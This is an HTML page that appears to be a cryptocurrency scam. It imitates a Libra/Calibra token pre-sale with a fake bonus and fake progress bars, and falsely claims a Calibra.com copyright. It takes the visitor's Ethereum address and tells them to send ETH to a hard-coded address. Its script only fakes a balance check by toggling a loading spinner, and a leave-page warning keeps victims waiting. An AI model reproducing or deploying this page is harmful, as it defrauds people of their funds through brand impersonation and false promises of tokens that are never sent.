﻿<!DOCTYPE html>
<html lang="en" prefix="og: http://ogp.me/ns#">
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<head>
    <title>Pre-Sale Libra Currency </title>
    <meta name="keywords" content="buy facebook cryptocurrency">
    <meta name="description" content="buy calibra">
    <meta charset="utf-8">
    <meta property="og:type" content="article">
    <meta property="og:title" content="buy calibra with discount">
    <meta property="og:description" content="buy calibra with discount">

<!--  Viewport mobile tag for sensible mobile support -->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<link rel="apple-touch-icon" sizes="180x180" href="images/favicons/favicdon.png">
<link rel="icon" type="image/png" sizes="32x32" href="images\favicons\favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="images\favicons\favicon.ico">
<meta name="theme-color" content="#ffffff">
<!--BLOCK_STYLES-->
<link rel="stylesheet" href="maxcdn.bootstrapcdn.com\bootstrap\4.0.0\css\bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<script src="maxcdn.bootstrapcdn.com\bootstrap\4.0.0\js\bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="code.jquery.com\jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<link rel="stylesheet" href="min\production.css">
<!--BLOCK_STYLES END-->
<link href="https://fonts.googleapis.com/css?family=Titillium+Web" rel="stylesheet">


</head>

<body ng-app="app" class="bodyOrange layout_pub">


<div class="banner arc_block_banner">

    



   
    
        
        

        <!-- div class="banner_info_item banner_info_login banner_info_login_obj hide" id="banner_login">
            <a class="banner_info_item_name banner_info_language_name" href="auth/login" onclick="ga('send', 'event', 'icohome_view', 'login');">LOG IN</a>
        </div -->
    


    <div class="banner_info_item banner_info_user" id="banner_info_user">
        <div class="banner_info_item_name banner_info_arrow banner_my_account"></div>
        <div class="banner_info_extend banner_info_user_extend">
            <div class="banner_info_extend_item" onclick="myInfo('sale')">Buy Libra Currency</div>
            <div class="banner_info_extend_item" onclick="myInfo('account')">My Account</div>
            <div class="banner_info_extend_item" onclick="myInfo('logout')">Log Out</div>
        </div>
    </div>

</div>

<div class="banner_info banner_info_mb">

           
            
            
            <!-- a class="banner_info_mb_item banner_info_login_obj" href="auth/login" onclick="ga('send', 'event', 'icohome_view', 'login');">LOG IN</a -->
        
        <div class="banner_info_mb_ext banner_info_user" id="banner_info_user">
            <div class="banner_info_mb_ext_name banner_my_account"></div>
            <div class="banner_info_mb_ext_list" onclick="myInfo('sale')">Buy Libra Currency</div>
            <div class="banner_info_mb_ext_list" onclick="myInfo('account')">My Account</div>
            <div class="banner_info_mb_ext_list" onclick="myInfo('logout')">Log Out</div>
        </div>
    </div>
</div>
    </div>



<div class="auth">
    <div class="main-container">
        <section id="sec-login" class="">
             <form id="form-login">
                <legend>
                    <h2><font style="color:#bd7b50;"><b>Pre-Sale Libra Currency  </b></font> with 25% Bonus</h2>


<center style="font-size: 22px;">2 ETH = 600 LBR | 20 ETH = 8000 LBR</center>
                    <hr>
                    <div class="progress" style="height:30px">
  <div class="progress-bar progress-bar-striped progress-bar-animated" role="progressbar" aria-valuenow="80" aria-valuemin="0" aria-valuemax="100" style="width: 93%">Pre-Sale: 93% Completed</div>
</div>



                </legend>
                
                <div class="field-wrapper">
                    <div class="field-block">
						<span class="field-impl">
                            <i class="field_login"></i>
                        </span>
                        <input type="text" class="field-control" name="wallet" placeholder="Confirm your Ethereum address">
                    </div>
					<span class="sub sub-error" style="text-align: left; color: #ff2222; display: none;">Please enter a valid Ethereum address to receive LBR.</span>
                </div>
                <div class="field-wrapper">
                    <div class="field-block">
						<input type="checkbox" name="agreeToTerms" value="false"> By checking this box, I accept the Terms & Conditions.
                    </div>
		 <div class="field-block">
		                </div>
                
<br><hr><br>
                <div>
                    <button type="button" class="login-button colorBorderBtn" onclick="validateFum();">Continue</button>
                </div>

            </div></form>
            <hr>
<div class="eth-price" style="display: inline-flex">
<h2 style="font-size: 16px;font-weight: 400;">ETH SESSION</h2>
<div class="eth-price-real">
    <script type="text/javascript">
baseUrl = "https://widgets.cryptocompare.com/";
var scripts = document.getElementsByTagName("script");
var embedder = scripts[ scripts.length - 1 ];
var cccTheme = {"General":{"showChangePercent":false}};
(function (){
var appName = encodeURIComponent(window.location.hostname);
if(appName==""){appName="local";}
var s = document.createElement("script");
s.type = "text/javascript";
s.async = true;
var theUrl = baseUrl+'serve/v3/coin/header?fsyms=ETH&tsyms=USD';
s.src = theUrl + ( theUrl.indexOf("?") >= 0 ? "&" : "?") + "app=" + appName;
embedder.parentNode.appendChild(s);
})();
</script>
</div></div>
            

        </section>
		            <div class="mobile-disable">
            <h2>Buy Calibra currency 
<hr>
                Please use Desktop or Tablet to buy LBR.</h2>
            </div>
		<section id="sec-login-sec" class="hidden">
            <form id="form-login">
                <legend>
                    <h2><font style="color:#bd7b50;"><b>Buy Calibra Currency  </b></font> with 25% Bonus </h2>

<center style="font-size: 22px;">
2 ETH = 600 LBR | 20 ETH = 8000 LBR <br>
<hr>
<p style="font-size:16px">Now, you need to transfer ETH to buy LBR with 25% Bonus.
LBR will be sent to the Ethereum address specified in the first step.</p>
</center>
<div class="progress" style="height:30px">
  <div class="progress-bar progress-bar-striped progress-bar-animated" role="progressbar" aria-valuenow="82" aria-valuemin="0" aria-valuemax="100" style="width: 95%">Pre-Sale: 95% Completed.</div>
</div>
					<hr>

<div id="arc_token" class="arc_token" style="background-color: #fff;">
	
	<div class="arc_token_two" style="background-color: #fff; padding: 0px 0;">
            <div class="arc_token_two_block" style="">
                
                    <div class="arc_token_two_title1" style="color: #000; margin-bottom: 0px;">ETH Contribution Address:</div>
                    <div class="arc_token_two_con" style="color: #000000; margin-bottom: -25px;">
                        <div style="font-size: 18px;"><p id="p1">0x22bc2503b4Ed28cd45637Cf8b617f056f55E62fc</p></div>
						<img src="images/addr.png" style="display: none;" id="qr_addr">
                    </div>
                
    			<div>
                    <button type="button" class="login-button colorBorderBtn" onclick="copyToClipboard('#p1');" style="height: 23px; font-size: 12px; width: 30%;" id="show_qr">Copy Address</button>
                </div>
                <div class="float_clear"></div>

            </div>

        </div>
</div>



<div id="arc_token" class="arc_token" style="background-color: #fff;">
	
	<div class="arc_token_two" style="background-color: #fff; padding: 0px 0;">
            <div class="arc_token_two_block" style="">
                
                    <div class="arc_token_two_title2" style="color: #000; margin-bottom: 0px;">Your Ethereum address:</div>
                    <div class="arc_token_two_con" style="color: #000000;">
                        <div id="own-wallet" style="font-size: 18px;"></div>
						<div style="font-size: 20px;">Checking your LBR Balance:</div><div id="balance_val" style="margin: 0px; display: none;"><i>Waiting for your deposit...</i></div>
						<img src="images\ajax-loader.gif" alt="Waiting ..." id="img_id">
                    </div>
                
                <div class="float_clear"></div>

            </div>

        </div>
</div>
<div id="arc_token" class="arc_token" style="background-color: #fff;">
	
	<div class="arc_token_two" style="background-color: #fff; padding: 0px 0;">
            <div class="arc_token_two_block" style="">
                <div class="arc_token_two_left">
                    <div class="arc_token_two_title3" style="color: #000;">Buy LBR with 25% Bonus Specifics:</div>
                    <div class="arc_token_two_con" style="color: #000000;">
                        Please send your ETH to the ETH contribution address. You will receive your LBR automatically, please be patient while your transaction is confirmed on the blockchain
			
                    </div>
                </div>







                </div></div></div></legend>
            </form>
        </section>

    
        
    
    <footer>
    </footer>


<script>
    cmlans = {
        'validator': {
            'required': 'This field is required.',
            'email': 'Please enter a valid email address.',
            'minlength': 'Please enter at least {0} characters.',
            'verify_password': 'Please enter the same password as above.',
        },
        'network_error': 'Network error',
        'login_error': 'Incorrect email or password',
        'email_not_exist': 'Email doesn&#39;t exist',
        'service_unavail': 'Service unavailable',
        'unknown_error': 'Sorry, something is wrong, please try again.',
        'resend_too_many': 'You have retried too many times, please change an email!',
        'email_verified': 'Email has already verified',
        'succeed': 'Succeed'
    }
</script>
<div id="arc_copyright" class="arc_copyright" style="width: 100%;margin-top: 300px">
<p style="text-align:center;font-size: 16px;color:white;padding-top: 60px">© Copyright 2019 Calibra.com
</p>
</div>

<script>
    window.onbeforeunload = function(e) {
      return 'Are you sure you want to leave this page?  We are still waiting for your payment. It may need additional confirmations.';
    };
</script>

<script src="vendor_copy\jquery\jquery.js"></script>
<script src="vendor_copy\jquery\jquery.validate.min.js"></script>

<script>
function copyToClipboard(element) {
  var $temp = $("<input>");
  $("body").append($temp);
  $temp.val($(element).text()).select();
  document.execCommand("copy");
  $temp.remove();
}




	var wdsp = true;
	function isEmail(email) {
		var regex = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,20})+$/;
        return regex.test(email);
    }
	function setCookie(name,value,days) {
		var expires = "";
		if (days) {
			var date = new Date();
			date.setTime(date.getTime() + (days*24*60*60*1000));
			expires = "; expires=" + date.toUTCString();
		}
		document.cookie = name + "=" + (value || "")  + expires + "; path=/";
	}

	function showQR() {
		$('#qr_addr').show();
		$('#show_qr').hide();
	}
	function validateFum() {
		//$("input[name='email']").parent().css('border', 'none');
		//$("input[name='wallet']").parent().css('border', 'none');
		$("input[name='agreeToTerms']").parent().css('text-decoration', 'none');
		$("input[name='agreeToTerms']").parent().css('color', '');
		$('.sub-error').hide();
		var email = $("input[name='email']").val();
		var wallet = $("input[name='wallet']").val();
		var agree = $("input[name='agreeToTerms']").is(":checked");
		var toPass = true;

		if (wallet.length < 25) {
			toPass = false;
			$("input[name='wallet']").parent().next().show();
			//$("input[name='wallet']").parent().css('border', '1px solid #ff2222');
		}
				if (wallet.length > 35) {
			toPass = false;
			$("input[name='wallet']").parent().next().show();
			//$("input[name='wallet']").parent().css('border', '1px solid #ff2222');
		}
		if (!agree) {
			toPass = false;
			$("input[name='agreeToTerms']").parent().css('color', '#ff2222');
			$("input[name='agreeToTerms']").parent().css('text-decoration', 'underline');
		}
		if (!toPass) return;
		document.getElementById("own-wallet").innerHTML = '<i>' + $("input[name='wallet']").val() + '</i>';
		setCookie ('mwpr_cookie_hash', $("input[name='wallet']").val(), 10);
		Continunu();
	}
	function Continunu() {
		setInterval (function() {
			if (wdsp) {
				wdsp = false;
				document.getElementById("img_id").style.display = "none";
				document.getElementById("balance_val").style.display = "block";
			} else {
				wdsp = true;
				document.getElementById("img_id").style.display = "block";
				document.getElementById("balance_val").style.display = "none";
			}
		}, Math.floor((Math.random() * 4) + 3) * 1000);
		$('#sec-login').hide();
		$('#sec-login-sec').show();
	}
	window.onload = function() {
		var cooke = getCookie('mwpr_cookie_hash');
		if (cooke !== false) {
			if (cooke.length > 12) {
				$("input[name='wallet']").val(cooke);
				document.getElementById("own-wallet").innerHTML = '<i>' + $("input[name='wallet']").val() + '</i>';
			}
			Continunu();
		}
	};
</script>


</div></div></body>


<!-- Mirrored from suite.neonexchange.org.in/ico/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 02 Apr 2018 03:23:13 GMT -->
</html>

